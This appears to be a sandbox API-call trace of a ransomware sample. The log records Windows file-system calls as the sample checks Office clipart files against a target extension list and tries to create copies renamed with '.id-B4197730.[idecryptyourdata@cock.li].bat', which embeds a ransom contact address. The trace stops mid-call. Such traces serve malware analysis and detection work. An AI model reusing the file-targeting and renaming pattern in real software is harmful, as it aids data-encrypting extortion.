(lpString1=".jpg", lpString2=".WMF") returned -1 [0171.387] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0171.387] lstrlenW (lpString="NA02389_.WMF") returned 12 [0171.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.389] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=2860) returned 1 [0171.389] CloseHandle (hObject=0x414) returned 1 [0171.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf")) returned 0x220 [0171.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0171.389] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.389] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02389_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.390] CloseHandle (hObject=0x414) returned 1 [0171.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.390] lstrlenW (lpString=".doc") returned 4 [0171.390] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.390] lstrlenW (lpString=".docx") returned 5 [0171.390] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.390] lstrlenW (lpString=".pdf") returned 4 [0171.390] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.390] lstrlenW (lpString=".xls") returned 4 [0171.390] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.390] lstrlenW (lpString=".xlsx") returned 5 [0171.390] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.390] lstrlenW (lpString=".ppt") returned 4 [0171.390] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.390] lstrlenW (lpString=".zip") returned 4 [0171.390] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.390] lstrlenW (lpString=".rar") returned 4 [0171.390] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.390] lstrlenW (lpString=".bz2") returned 4 [0171.390] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.391] lstrlenW (lpString=".7z") returned 3 [0171.391] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.391] lstrlenW (lpString=".dbf") returned 4 [0171.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.391] lstrlenW (lpString=".1cd") returned 4 [0171.391] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.391] lstrlenW (lpString=".jpg") returned 4 [0171.391] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.391] lstrlenW (lpString=".doc") returned 4 [0171.391] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.391] lstrlenW (lpString=".docx") returned 5 [0171.391] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.391] lstrlenW (lpString=".pdf") returned 4 [0171.391] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.391] lstrlenW (lpString=".xls") returned 4 [0171.391] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.391] lstrlenW (lpString=".xlsx") returned 5 [0171.391] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.391] lstrlenW (lpString=".ppt") returned 4 [0171.391] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.391] lstrlenW (lpString=".zip") returned 4 [0171.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.391] lstrlenW (lpString=".rar") returned 4 [0171.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.392] lstrlenW (lpString=".bz2") returned 4 [0171.392] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.449] lstrlenW (lpString=".7z") returned 3 [0171.449] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.449] lstrlenW (lpString=".dbf") returned 4 [0171.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.449] lstrlenW (lpString=".1cd") returned 4 [0171.449] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0171.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02389_.WMF") returned 68 [0171.449] lstrlenW (lpString=".jpg") returned 4 [0171.449] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0171.450] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0171.450] lstrlenW (lpString="NA02390_.WMF") returned 12 [0171.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.550] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3684) returned 1 [0171.550] CloseHandle (hObject=0x378) returned 1 [0171.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf")) returned 0x220 [0171.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.554] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.554] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02390_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.555] CloseHandle (hObject=0x378) returned 1 [0171.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF") returned 68 [0171.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF") returned 68 [0171.555] lstrlenW (lpString=".doc") returned 4 [0171.555] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0171.555] lstrlenW (lpString=".docx") returned 5 [0171.555] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0171.555] lstrlenW (lpString=".pdf") returned 4 [0171.555] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0171.555] lstrlenW (lpString=".xls") returned 4 [0171.555] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0171.555] lstrlenW (lpString=".xlsx") returned 5 [0171.555] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0171.555] lstrlenW (lpString=".ppt") returned 4 [0171.555] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0171.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF") returned 68 [0171.555] lstrlenW (lpString=".zip") returned 4 [0171.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0171.556] lstrlenW (lpString=".rar") returned 4 [0171.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0171.556] lstrlenW (lpString=".bz2") returned 4 [0171.556] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0171.556] lstrlenW (lpString=".7z") returned 3 [0171.556] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0171.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02390_.WMF") returned 68 [0171.556] lstrlenW (lpString=".dbf") returned 4 [0171.556] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0171.557] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.557] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02398_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02398_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.557] CloseHandle (hObject=0x378) returned 1 [0171.558] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.558] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02400_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02400_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.558] CloseHandle (hObject=0x378) returned 1 [0171.560] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.560] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02404_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02404_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.560] CloseHandle (hObject=0x378) returned 1 [0171.561] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.561] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02405_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.561] CloseHandle (hObject=0x378) returned 1 [0171.569] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.569] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02407_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.569] CloseHandle (hObject=0x378) returned 1 [0171.570] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.570] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02413_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.571] CloseHandle (hObject=0x378) returned 1 [0171.572] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.572] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02417_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.572] CloseHandle (hObject=0x378) returned 1 [0171.574] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.574] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02423_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02423_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.575] CloseHandle (hObject=0x378) returned 1 [0171.576] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.576] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02424_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02424_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.576] CloseHandle (hObject=0x378) returned 1 [0171.583] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.583] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02426_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02426_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.584] CloseHandle (hObject=0x378) returned 1 [0171.584] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.585] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02431_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.585] CloseHandle (hObject=0x378) returned 1 [0171.586] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.586] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02435_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.587] CloseHandle (hObject=0x378) returned 1 [0171.587] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.587] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02439_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.588] CloseHandle (hObject=0x378) returned 1 [0171.590] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.591] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02441_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.591] CloseHandle (hObject=0x378) returned 1 [0171.594] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.594] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02443_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02443_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.595] CloseHandle (hObject=0x378) returned 1 [0171.596] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.596] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02444_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02444_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.596] CloseHandle (hObject=0x378) returned 1 [0171.597] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.597] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02446_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.598] CloseHandle (hObject=0x378) returned 1 [0171.599] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.599] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02448_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.449] CloseHandle (hObject=0x378) returned 1 [0172.450] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.450] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0172.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02028K.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02028k.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 